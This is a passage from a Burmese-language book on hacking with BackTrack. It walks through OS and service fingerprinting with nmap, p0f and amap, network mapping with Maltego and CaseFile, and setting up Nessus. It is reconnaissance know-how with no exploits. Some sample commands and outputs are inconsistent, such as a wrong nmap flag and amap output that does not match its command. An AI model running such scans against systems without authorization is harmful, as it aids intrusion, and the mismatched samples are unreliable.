ထိုသို႕ျပဳလုပ္ရန္အတြက္ လိုအပ္ေသာ Tool မွာ Wireshark Capture ဖိုင္တစ္ဖိုင္ျဖစ္ၿပီး အဆင့္ ၂ ကို


ၿပီးေျမာက္ေစရန္အတြက္ အသံုးျပဳရမည္ျဖစ္သည္။ စတင္လုပ္ေဆာင္ရန္အတြက္ Terminal Window
ကိုဖြင့္၍ လုပ္ေဆာင္ေပးရမည္ျဖစ္သည္။

၁။ Nmap ကိုအသံုးျပဳျခင္းျဖင့္ OS detection feature ကိုထည္႕သြင္းအသံုးျပဳရန္အတြက္ -o option ကို


ပါ၀င္ေစၿပီး ေအာက္ပါ Command ကိုအသံုးျပဳရမည္ျဖစ္သည္။

Nmap –o 192.168.56.102

62 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ p0f ကိုအသံုးျပဳ၍ Wireshark capture file ကို Analyze ျပဳလုပ္ရမည္ျဖစ္သည္။

p0f -s /tmp/targethost.pcap -o p0f-result.log -l

p0f - passive os fingerprinting utility, version 2.0.8


(C) M. Zalewski <[email protected]>, W. Stearns <[email protected]>
p0f: listening (SYN) on 'targethost.pcap', 230 sigs (16 generic), rule: 'all'.
[+] End of input file.

Service Fingerprinting
သတ္မွတ္ထားေသာ Port မ်ားတြင္ ေအာင္ျမင္ေသာ ထိုးေဖာက္မႈအျဖစ္ လုပ္ေဆာင္ႏိုင္ေစရန္ အတြက္
Service fingerprinting လုပ္ေဆာင္ခ်က္ကို လုပ္ေဆာင္ေပးရန္လိုအပ္ပါလိမ့္မည္။ ထိုလုပ္ေဆာင္ခ်က္
သည္ OS fingerprinting process ၏ေနာက္ဆက္တြလ
ဲ ုပ္ေဆာင္ရေသာ လုပ္ငန္းစဥ္တစ္ရပ္ျဖပ္၍
သိရိွထားေသာ OS ေပၚတြင္ ေမာင္းႏွင္ထားေသာ Service မ်ားကို သိရိွႏိုင္ေစရန္အတြက္ အသံုးျပဳႏိုင္
မည္ျဖစ္သည္။

စတင္ရန္အတြက္ ေအာက္ပါလုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ လုပ္ေဆာင္ေပးရမည္ျဖစ္သည္။

၁။ Terminal Window ကိုဖြင့္ၿပီးေနာက္ ေအာက္ပါ Command ကိုရိုက္ထည္႕ေပးရပါမည္။

nmap -sV 192.168.10.200

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-28 05:10 CDT


Interesting ports on 192.168.10.200:
Not shown: 1665 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd 5.0
25/tcp open smtp Microsoft ESMTP 5.0.2195.6713
80/tcp open http Microsoft IIS webserver 5.0
119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok)
မ်က္ပြင့္စာေပ 63
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

135/tcp open msrpc Microsoft Windows RPC


139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1755/tcp open wms?
3372/tcp open msdtc?
6666/tcp open nsunicast Microsoft Windows Media Unicast Service (nsum.exe)
MAC Address: 00:50:56:C6:00:01 (VMware)
Service Info: Host: DC; OS: Windows
Nmap finished: 1 IP address (1 host up) scanned in 63.311 seconds

၂။ Amap ကိုအသံုးျပဳၿပီး သတ္မွတ္ထားေသာ Port တြင္ေမာင္းႏွင္ထားေသာ Application သို႕မဟုတ္ Port


၏ Range ကိုေအာက္တြင္ေဖာ္ျပထားေသာ ဥပမာႏွင့္ စစ္ေဆးႏိုင္မည္ျဖစ္သည္။

amap -bq 192.168.10.200 200-300

amap v5.4 (www.thc.org/thc-amap) started at 2012-03-28 06:05:30 - MAPPING mode


Protocol on 127.0.0.1:212/tcp matches ssh - banner: SSH-2.0- OpenSSH_3.9p1\n
Protocol on 127.0.0.1:212/tcp matches ssh-openssh - banner: SSH-2.0-OpenSSH_3.9p1\n
amap v5.0 finished at 2005-07-14 23:02:11

64 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Thereat Assessment with Maltego


ယခုအပိုင္းတြင္ BackTrack တြင္ ပါ၀င္ေသာ Maltego ကိုအသံုးျပဳျခင္းအေၾကာင္းကို ေဖာ္ျပေပးမည္
ျဖစ္သည္။ Maltego သည္ Open Source တစ္ခုျဖစ္ၿပီး Threat Assessment Tool တစ္ခုဟုလည္း
ေခၚဆိုႏိုင္ပါသည္။ ၄င္းသည္ ကြန္ယက္တစ္ခုတြင္ရိွေသာ Complexity ႏွင့္ Single Point ၏ Serverity
က်ိဳးေပါက္မႈကို ေဖၚျပႏို္င္ရန္ Design ျပဳလုပ္ထားပါသည္။ ၄င္း Maltego တြင္ Internal သို႕မဟုတ္
External Sources ႏွစ္ခုစလံုး၏ Information မ်ားကို Aggregate ျပဳလုပ္ႏိုင္စြမ္းရိွပါသည္။ ထို႕အျပင္
Clear Threat Picture တစ္ခုအျဖစ္လည္း ေထာက္ပံ့ေပးႏိုင္ပါသည္။ ထို Maltego အေၾကာင္း စတင္
ေလ့လာရန္အတြက္ Account တစ္ခုလိုအပ္မည္ျဖစ္သည္။ ထို Account ကို ေအာက္ေဖာ္ျပပါ Web Site
Address တြင္ Register ျပဳလုပ္ႏိုင္မည္ျဖစ္ပါသည္။

http://www.paterva.com/web6/community/. တြင္Account ဖြင့္ၿပီးေသာအခါတြင္ လုပ္ေဆာင္ခ်က္


မ်ားကို စတင္ေလ့လာႏိုင္ၿပီျဖစ္သည္။ ေလ့လာမႈကို စတင္ရန္အတြက္ Maltego ကို စတင္ဖြင့္လွစ္ရပါမည္။

၁။ Maltego ကိုစတင္ဖြင့္လွစ္ရန္အတြက္ Application> BackTrack> Information Gathering> Web


Application Analysis> Open Source Analysis> Maltego ဟုအဆင့္ဆင့္သြားေရာက္ေရြးခ်ယ္ေပးရ
ပါမည္။

မ်က္ပြင့္စာေပ 65
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ အေသးစိပ္က်ေသာ Login ကို ၀င္ေရာက္ႏိုင္ရန္အတြက္ Startup Wizard မွ Next တြင္ Click ႏိွပ္ပါ။

၃။ Login Credential ကို Validate ျဖစ္ေစရန္အတြက္ Next တြင္ click ႏိွပ္ပါ။ Validate ျဖစ္သြားေသာ
အခါတြင္ ေရွ႕ဆက္ရန္ Next ကိုေရြးခ်ယ္ေပးရပါမည္။

၄။ Transform Seed Settings မ်ားကို ေရြးခ်ယ္ေပးၿပီးေနာက္ Next တြင္ Click ႏိွပ္ပါ။

66 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၅။ ေနာက္ ျမင္ကြင္းတစ္ခုသို႕ ေရွ႕မဆက္မီတြင္ ၄င္း Wizard သည္ လုပ္ေဆာင္ခ်က္အမ်ားအျပားကို


ေဆာင္ရြက္မည္ျဖစ္ပါသည္။ ၿပီးဆံုးသြားေသာအခါ Open a blank graph and let me play around ကို
ေရြးခ်ယ္၍ Finish တြင္ Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 67
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ စတင္ရန္အတြက္ Component Palette မွ Domain တစ္ခုလံုးကို Drag and drop ျပဳလုပ္၍ New
Graph document ေပၚသို႕ ဖိဆေ
ြဲ ပးပါ။

၇။ တည္ေဆာက္ၿပီး Domain တစ္ခုလံုးကို Click ႏိွပ္ၿပီး Property View ေပၚတြင္ရိွေသာ Domain Name
Property ကိုလည္း ျပင္ဆင္ေပးျခင္းျဖင့္ Domain Name Target ကိုသတ္မွတ္ေပးႏိုင္ပါသည္။

68 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ Target ကိုသတ္မွတ္ၿပီးေသာအခါတြင္ အခ်က္အလက္စုေဆာင္းျခင္းကို စတင္ႏိုင္ၿပီျဖစ္ပါသည္။ ထိုသို႕


စတင္ရန္အတြက္ တည္ေဆာက္ထားေသာ Domain Entity ေပၚတြင္ Right Click ႏိွပ္ၿပီး ေပၚလာေသာ
Option မ်ားမွ Run Transform ကုိေရြးခ်ယ္ေပးရပါမည္။

၉။ DNS Names မ်ား၊ WHIOS လုပ္ေဆာင္မႈမ်ားႏွင့္ E-mail Address မ်ားႏွင့္ အျခားေသာ


အခ်က္အလက္မ်ားကို ရွာေဖြရန္ ေရြးခ်ယ္ႏိုင္ပါသည္။ ထိ႕ု အျပင္ ေအာက္တြင္ျပထားသည္႕အတိုင္း
Transform အားလံုးကို ေမာင္းႏွင္ရန္အတြက္ကိုလည္း ေရြးခ်ယ္ေပးႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 69
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ လိုအပ္ေသာ အခ်က္အလက္မ်ားအားလံုးကို ရသည္အထိ Linked ျပဳလုပ္ထားေသာ Child Node


မ်ားေပၚတြင္ ပံုစံတူလုပ္ေဆာင္ခ်က္မ်ားအတိုင္း လုပ္ေဆာင္၍ အခ်က္အလက္မ်ားကို ပိုမို ရွာေဖြႏိုင္ပါ
သည္။

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာရလွ်င္

ယခုအပိုင္းတြင္ ကြန္ယက္တစ္ခုကို Map လုပ္ရန္အတြက္ Maltego ကိုအသံုးျပဳခဲ့ပါသည္။ Maltego သည္


Open Source Tool တစ္ခုျဖစ္ၿပီး အခ်က္အလက္စုေဆာင္းျခင္းႏွင့္ Forensic မ်ားအတြက္
အသံုးျပဳႏိုင္ပါသည္။ ၄င္း Maltego ကို Paterva မွ ဖန္တီးထားျခင္းျဖစ္ပါသည္။ ယခုအပိုင္း တြင္ Seup
Wizard မွ စတင္ၿပီး Graph တြင္ Domain Entity ကို ဆြယ
ဲ ူထည္႕သြင္းျခင္းျဖင့္ အသံုးျပဳခဲ့ပါ သည္။
ေနာက္ဆံုးတြင္ အလုပ္မ်ားကို ၿပီးဆံုးရန္ အမ်ိဳးမ်ိဳးေသာ Sources မ်ားကိုစစ္ေဆးျခင္းျဖင့္ Graph ကို
ၿပီးျပတ္ေအာင္ေဆာင္ရြက္ေစႏိုင္ျခင္းျဖင့္ နိဂံုးခ်ဳပ္ထားပါသည္။ ယင္းသည္ Maltego ကုိလြန္မင္းစြာ
အသံုးတည္႕ေစပါသည္။ အေၾကာင္းမွာ Email Address မ်ား၊ Server မ်ားရွာေဖြျခင္း WHIOS lookup ႏွင့္
အျခားေသာ အခ်က္အလက္မ်ားရွာေဖြျခင္းကဲ့သို႕ေသာ Target ေပၚမွ အခ်က္အလက္မ်ားကို လွ်င္ျမန္စြာ
စုေဆာင္းရန္အတြက္ အသံုးျပဳႏိုင္၍ ျဖစ္ပါသည္။

မွတ္ခ်က္။ ။ Maltego ၏ Community Edition သည္ အခ်က္အလက္စုေဆာင္းျခင္း၏ အစိတ္အပိုင္း


အျဖစ္ Transform ၇၅ ခုကိုသာအသံုးျပဳေစႏိုင္ပါသည္။ ပိုမိုမ်ားျပားစြာ အသံုးျပဳႏိုင္ရန္ အတြက္ Full
Version ကိုအသံုးျပဳရမည္ျဖစ္ၿပီး လက္ရိွတြင္ ေဒၚလာ ၆၅၀ ျဖင့္ ေရာင္းခ်လ်က္ရိွပါသည္။

Transforms ကို Activate/Deactivate ျပဳလုပ္ရန္အတြက္ Transform Manager Window ေအာက္မွ


Manage Ribbon Tab ကိုအသံုးျပဳႏိုင္ပါသည္။

70 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Transformation အမ်ားအျပားကိုအသံုးျပဳေစႏိုင္ရန္အတြက္ Disclaimer ကိုဦးစြာလက္ခံေပးရပါမည္။

Mapping the network


ယခင္အပိုင္းမ်ားတြင္ လိုအပ္ေသာ အခ်က္အလက္မ်ားစုေဆာင္းျခင္းေဖာ္ျပခဲ့ၿပီး ယခုအပိုင္းတြင္ ထိုးေဖာက္
လိုေသာ ကြန္ယက္တစ္ခု၏ Blueprint တည္ေဆာက္ျခင္းကို ဆက္လက္ေလ့လာၾကည္႕ၾကပါ မည္။
ယခုအပိုင္းသည္ အခ်က္အလက္စုေဆာင္ျခင္းအခန္း၏ ေနာက္ဆံုးအပိုင္းလည္းျဖစ္ၿပီး ယခုအခန္း တြင္
Maltego CaseFile ကိုအသံုးျပဳၿပီး အခ်က္အလက္မ်ားကို Organize ျပဳလုပ္ျခင္းကို ေဖာ္ျပေပးသြားမည္
ျဖစ္သည္။

CaseFile သည္ (Developer ၏ Website တြင္ေဖာ္ျပထားသည္႕အတိုင္း တင္ျပျခင္းျဖစ္သည္) Transform


မ်ားမပါ၀င္ေသာ Maltego ႏွင့္ အလားတူျဖစ္ေသာ္လည္း Feature မ်ားလည္း အမ်ားအျပား ပါ၀င္ပါသည္။
ထို႕ေၾကာင့္ လုပ္ေဆာင္ခ်က္မ်ားကို စတင္ေလ့လာၾကည္႕ၾကပါမည္။

၁။ CaseFile ကိုစတင္ရန္အတြက္ Applications> BackTrack> Reporting Tools> Evidence


Management> CaseFile အတိုင္းအဆင့္ဆင့္ေရြးခ်ယ္ပါ။

၂။ New Graph တစ္ခုကို ဖန္တီးရန္ CaseFile ၏ Application Menu မွ New ကုိေရြးခ်ယ္ပါ။

မ်က္ပြင့္စာေပ 71
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Maltego တြင္အသံုးျပဳခဲ့သကဲ့သို႕ပင္ Component Patette မွ Entity တစ္ခုစီကို Graph Document


ေပၚသို႕ Mouse ျဖင့္ Click & Drag ျပဳလုပ္၍ ဆြထ
ဲ ည္႕ေပးရပါမည္။ စတင္ရန္အတြက္ Domain entity ကို
ဆြထ
ဲ ည္႕ၿပီးေနာက္ Domain Name Property ကိုေျပာင္းလဲႏိုင္ပါသည္။

72 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ Note တစ္ခုကိုထည္႕သြင္းရန္အတြက္ Mouse တြင္ပါ၀င္ေသာ Scroll Wheel ကို Entitiy ေပၚတြင္


လွည္႕ပတ္ရွာေဖြျခင္းျဖင့္ Note Icon ကိုေတြ႕ရိွႏိုင္မည္ျဖစ္သည္။ ေတြ႕ရိွရေသာအခါတြင္ ထို Note Icon
ေပၚတြင္ Double Click ႏိွပ္ေပးပါ။

၅။ Target မွ DNS Information မ်ားကိုမွတ္သားထားရန္အတြက္ အျခားေသာ Entity ေနာက္တစ္ခုကို


ဆြထ
ဲ ည္႕ေပးရပါမည္။

မ်က္ပြင့္စာေပ 73
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Entity မ်ားကို Link ခ်ိတ္ရန္အတြက္ Entity တစ္ခုမွ တစ္ခုသို႕ Line အတိုင္း ဆြထ
ဲ ည္႕ေပးရပါမည္။
ေအာက္ေဖာ္ျပပါပံုကိုၾကည္႕ပါ။

၇။ လိုအပ္ပါက link ၏ Properties မ်ားကို ျပင္ဆင္ႏိုင္ပါသည္။

74 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ အဆင့္ ၅၊ ၆၊ ႏွင့္ ၇ အတိုင္းထပ္မံလုပ္ေဆာင္ျခင္းျဖင့္ Organization ၏ Network အေၾကာင္းကို Graph


သို႕ပိုမိုေသာ အခ်က္အလက္မ်ားကို ေပါင္းထည္႕ႏိုင္ပါသည္။

၉။ ေနာက္ဆံုးအဆင့္အေနျဖင့္ Information Graph ကို သိမ္းဆည္းရမည္။ Graph Document ကို Target


မွ ပိုမိုေသာအခ်က္အလက္မ်ားကိုအေျခအေနအလိုက္ေျပာင္းလဲျခင္းစသည္ ႕ လိုအပ္ေသာအခ်ိန္ မ်ားတြင္
ဖြင့္ၾကည္႕ႏိုင္ၿပီး ျပင္ဆင္ႏိုင္ပါသည္။

မ်က္ပြင့္စာေပ 75
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄င္း၏အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕ရလွ်င္ Network ကို Map ျပဳလုပ္ရန္အတြက္ Maltego


CaseFle ကိုအသံုးျပဳခဲ့ပါသည္။ CaseFile သည္ Visual Intelligence Application တစ္ခုျဖစ္ၿပီး
ရာႏွင့္ခ်ီေသာ ကြျဲ ပားျခားနားသည္႕အခ်က္အလက္မ်ားအၾကား ဆယ္သြယ္မႈမ်ားႏွင့္ Link မ်ားကို ဆံုးျဖတ္
ခြျဲ ခားရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။ ၄င္းသည္ အမ်ားအားျဖင့္ Offline Inttelligence သာျဖစ္ၿပီးအရွင္း
ဆံုးဆိုရလွ်င္ Manual Process ဟုဆိုႏိုင္ပါသည္။ ယခုအခန္းကို CaseFile ကိုဖြင့္လွစ္ျခင္းျဖင့္ စတင္ခဲ့ၿပီး
Graph အသစ္ျပဳလုပ္ျခင္းကိုလည္း ေဖာ္ျပခဲ့ပါသည္။ ထိ႕ု ေနာက္ Knowledge ကိုအသံုးျပဳ၍ ကြန္ယက္ႏွင့္
Graph အတြင္းသို႕ Component မ်ားထည္႕သြင္းပံုတို႕ကို ေဖာ္ျပေပးခဲ့ပါသည္။ ေနာက္ဆံုးတြင္ Graph ကို
သိမ္းဆည္းျခင္းျဖင့္ အဆံုးသတ္ခဲ့ပါသည္။

Graph Document ကုိအျခားလူမ်ားသံုးစြျဲ ခင္းမွ ကာကြယ္ရန္အတြက္ Encrypt ျပဳလုပ္ ထားႏိုင္ပါသည္။


ထိုသို႕ Encrypt ျပဳလုပ္ရန္အတြက္ သိမ္းဆည္းသည္႕အခါတြင္ Encrypt (AES-128) ဟူေသာ Check Box
ကိုအမွန္ျခစ္ေပးထားကာ Password ေပးထားႏိုင္မည္ျဖစ္သည္။



76 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 4

Vulnerability Identification
အားနည္းခ်က္ယိုေပါက္ ရွာေဖြျခင္း

မ်က္ပြင့္စာေပ 77
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
တိုက္ခိုက္လိုေသာ Target ေပၚတြင္ အားနည္းခ်က္၊ ယိုေပါက္မ်ားရွာေဖြရျခင္းသည္ ကၽြမ္းက်င္သူ မ်ား၊
Ethical Hacker မ်ားအတြက္ ပ်င္းရိျငီးေငြ႕ဖြယ္ေကာင္းေသာအလုပ္မ်ားထဲမွ တစ္ခုဟု ဆိုႏိုင္ေသာ္ လည္း
၄င္းသည္ပင္ အေရးအႀကီးဆံုးလုပ္ေဆာင္ရေသာ အလုပ္မ်ားထဲမွ တစ္ခုလည္း ျဖစ္ေနေစပါသည္။

အားနည္းခ်က္ရွာေဖြျခင္းသည္ အေရးႀကီးသည္႕လုပ္ငန္းစဥ္ျဖစ္သည္႕အေလွ်ာက္ ယခုအခန္းတြင္


ေအာက္ပါအပိုင္းမ်ားကို ေသခ်ာစြာေလ့လာရမည္ျဖစ္ပါသည္။ ၄င္းတိ႕ု မွာ

 Linux Vulnerabilities
 Windows Vulnerabilities
 Local Security checks
 Network Service Vulnerabilities တို႕ပင္ျဖစ္ပါသည္။ ယခုအခန္းတြင္ ပါ၀င္ေသာ ေလ့လာ
ရမည္႕ အပိုင္းခြဲမ်ားကို ေအာက္တြင္ ေဖာ္ျပထားပါသည္။ ယင္းတို႕မွာ
 Installing, Cnfiguring, and Starting Nessus
 Nessus – finding local vulnerabilities
 Nessus – finding network vulnerabilities
 Nessus – finding linux-specific vulnerabilities
 Nessus – finding Windows-specific vulnerabilities
 Installing, Configuring, and Starting OpenVAS
 OpenVAS – finding local vulnerabilities
 OpenVAS – finding network vulnerabilities
 OpenVAS – finding linux specific vulnerabilities
 OpenVAS – finding Windows-specific Vulnerabilities တို႕ျဖစ္ပါသည္။
ထိုေၾကာင့္ ယခုအားနည္းခ်က္ရွာေဖြျခင္းအခန္းကို စတင္ေလ့လာၾကပါစို႕

78 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Installing, Configuring, and Starting Nessus


ယခုအပိုင္းတြင္ Nessus ကို Install ျပဳလုပ္ျခင္း၊ Configure ျပဳလုပ္ျခင္းႏွင့္ စတင္အသံုးျပဳျခင္း စသည္
တို႕ကို ေဖာ္ျပေပးသြားမည္ျဖစ္ပါသည္။ Nessus ကိုအသံုးျပဳရာတြင္ ေရြးခ်ယ္ထားေသာ တိုက္ခိုက္မည္႕
Target မွ အားနည္းခ်က္မ်ားကို သိရိွႏိုင္ေစရန္ အားနည္းခ်က္ယိုေပါက္မ်ားအေပၚတြင္မူတည္၍ အသြင္
ႏွစ္မ်ိဳးကြျဲ ပားပါသည္။ ၄င္းတို႕မွာ Home ႏွင့္ Professional တို႕ျဖစ္ပါသည္။

 Home Feed: Home Feed ကို စီးပြားျဖစ္မဟုတ္ေသာ တစ္ကိုယ္ေရတစ္ကာယ


အသံုးျပဳမႈမ်ားအတြက္ ရည္ရြယ္ပါသည္။ အသက္ေမြး၀မ္းေက်ာင္းနယ္ပယ္မွ မည္သည္႕
ရည္ရြယ္ခ်က္ျဖင့္ အသံုးျပဳမႈျဖစ္ေစ Nessus ကိုအသံုးျပဳခဲ့ပါက Professional Feed ကို
အသံုးျပဳရန္ လိုအပ္မည္ျဖစ္ပါသည္။
 Professional Feed: Professional Feed ကို Commercial အတြက္အသံုးျပဳႏိုင္ ပါသည္။
၄င္းတြင္ Unlimited Concurrent Connection မ်ားႏွင့္အျခားေသာ Tool မ်ားႏွင့္ ဆက္စပ္
Features မ်ားကို ေထာက္ပံ့ေပးျခင္းမ်ားပါ၀င္ပါသည္။
ယခုအပိုင္းတြင္ Home Feed ကုိသာအသံုးျပဳၾကည္႕ၾကပါမည္။

စတင္အသံုးျပဳရန္အတြက္ Internet Connection ႏွင့္ Nessus Home Feed အတြက္ License အျဖစ္
အသံုးျပဳထားရန္လိုအပ္ပါမည္။ ထို႕ေၾကာင့္ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္ ေလ့လာၾကည္႕ၾက
ပါမည္။

၁။ Terminal Window ကိုဖြင့္ပါ။

၂။ Nessus ကို Install ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

apt-get install nessus


၃။ အထက္ပါ Command အရ Nessus ကို /opt/nessus လမ္းေၾကာင္းေအာက္တြင္ Install ျပဳလုပ္မည္
ျဖစ္ပါသည္။

၄။ Install ျပဳလုပ္ျခင္း လုပ္ငန္းစဥ္ၿပီးဆံုးေသာအခါတြင္ ေအာက္ပါ Command ကိုအသံုးျပဳျခင္းျဖင့္ Nessus


ကို စတင္အသံုးျပဳႏိုင္မည္ျဖစ္ပါသည္။
မ်က္ပြင့္စာေပ 79
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

/etc/init.d/nessusd start

အကယ္၍ ေအာက္တင
ြ ္ေဖာ္ျပထားေသာပံုအတိုင္း Error Message ေပၚလာလွ်င္ ယခုအပိုင္း၏ ေအာက္တြင္ ေရးသား
ထားေသာ မွတ္ရန္ ဟူေသာ အဆင့္အတိုင္း ျပဳလုပ္ေပးၾကပါရန္။

၅။ Install ျပဳလုပ္ထားေသာ Nessus ကို Register ျပဳလုပ္ရန္အတြက္ ေအာက္ေဖာ္ျပပါ command အတိုင္း


ျပဳလုပ္သံုးစြဲႏိုင္ပါသည္။

/opt/nessus/bin/nessus-fetch –register XXXX-XXXX-XXXX-XXXX-XXXX

ယခုအဆင့္တြင္ http://plugins.nessus.org မွ ေနာက္ဆံုးထြက္ Plugin မ်ားကိုလည္း သံုးစြႏ


ဲ ိုင္ပါသည္။

မွတ္ရန္။ ။ထိုသို႕လုပ္ေဆာင္ျခင္းသည္ Internet Connection ေပၚတြင္ မူတည္ၿပီး ၁ မိနစ္မွ ၂ မိနစ္


ခန္႕အထိ ၾကာျမင့္ႏိုင္ပါသည္။

၆။ Terminal တြင္ေအာက္တြင္ေဖာ္ျပထားေသာ Command ကို ရိုက္ထည္႕ရပါမည္။

/opt/nessus/sbin/nessus-adduser

မွတ္ရန္။ ။ထိုကဲ့သို႕ Command ျဖင့္သံုးစြျဲ ခင္းမျပဳဘဲ Applications> BackTrack> Vulnerability


Assessment> Vulnerability Scanners> Nessus> nessus user add သိ႕ု အဆင့္ဆင့္ ၀င္ေရာက္၍
လည္း ေရြးခ်ယ္ႏိုင္ပါသည္။

၇။ Login ျပဳလုပ္ရန္ ေဖာ္ျပေသာအခါ User ၏ Login Name ကို ရိုက္ထည္႕ေပးရပါမည္။

၈။ Password ကိုႏွစ္ႀကိမ္ရိုက္ထည္႕ေပးရပါမည္။

၉။ User ကို Administrator အျဖစ္အသံုးျပဳေစႏိုင္ရန္အတြက္ y (yes) ဟုေရြးခ်ယ္ေပးပါ။


80 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

မွတ္ရန္။ ။ထိုအခ်က္သည္ပထမဆံုးေသာ User ကိုျပဳလုပ္သည္႕အခါတြင္သာလိုအပ္မည္ျဖစ္သည္။

၁၀။ ၿပီးဆံုးေသာအခါတြင္ ေအာက္ေဖာ္ျပပါ Command ကုိအသံုးျပဳၿပီး Nessus ကုိေမာင္းႏွင္ႏိုင္မည္ျဖစ္


သည္။ သတိထားရန္အခ်က္တစ္ခုမွာ User Account တစ္ခုခု မရိွပဲ မစတင္ႏိုင္ပါ။

/etc/init.d/nessusd start

၁၁။ Nessus သိ႕ု LogIn ၀င္ေရာက္ရန္ https://127.0.0.1:8834 သိ႕ု သြားေရာက္ပါ။

မွတ္သားရန္။ ။ အကယ္၍ Nessus ကိုလိုအပ္ပါက BackTrack ကို Install ျပဳလုပ္ထားေသာ Local


Machine မွျဖစ္ေစ၊ Virtual Machine မွျဖစ္ေစ အသံုးျပဳႏိုင္ပါသည္။ Nessus ကို Activate ျပဳလုပ္ရမည္႕
အခ်က္သည္ အသံုးျပဳမည္႕ Environment အေပၚတြင္မူတည္ပါသည္။ အကယ္၍ USB Key တစ္ခုေပၚသို႕
Install ျပဳလုပ္ထားပါက Machine ကို Restart ျပဳလုပ္သည္႕အခါတိုင္းတြင္ Reactivate ျပဳလုပ္ရန္ လိုအပ္
ပါမည္။

ယခုအပိုင္းတြင္ Termianl Window ကိုဖြင့္၍ Repository မွတစ္ဆင့္ Nessus ကို Install ျပဳလုပ္ျခင္းကို
ေဖာ္ျပခဲ့ပါသည္။ ေနာက္ပိုင္းတြင္ Nessus ကိုစတင္ၿပီး Program ကို utilize ျပဳလုပ္ရန္ feed certificate
ကို Install ျပဳလုပ္ရျခင္းကိုလည္း ေဖာ္ျပေပးခဲ့ပါသည္။

Nessus ကို Register လုပ္ရန္အတြက္ Valid License ရိွရမည္ျဖစ္ၿပီး ၄င္းကို http:// www.tenable.com
/products/nessus/nessus-homefeed တြင္ရယူႏိုင္ပါသည္။ သတိထားရန္အခ်က္ မွာ ထိုသို႕ရယူရန္
အတြက္ Flash Player ရိွေသာ Browser တြင္သာ ရယူႏိုင္မည္ျဖစ္ေသာေၾကာင့္ Firefox ကဲ့သို႕ေသာ
Browser မ်ိဳးတြင္မလုပ္ေဆာင္မီ Flash Plugin ကိုထည္႕သြင္းရမည္ျဖစ္ပါသည္။ Flash Plugin ရယူလိုပါက
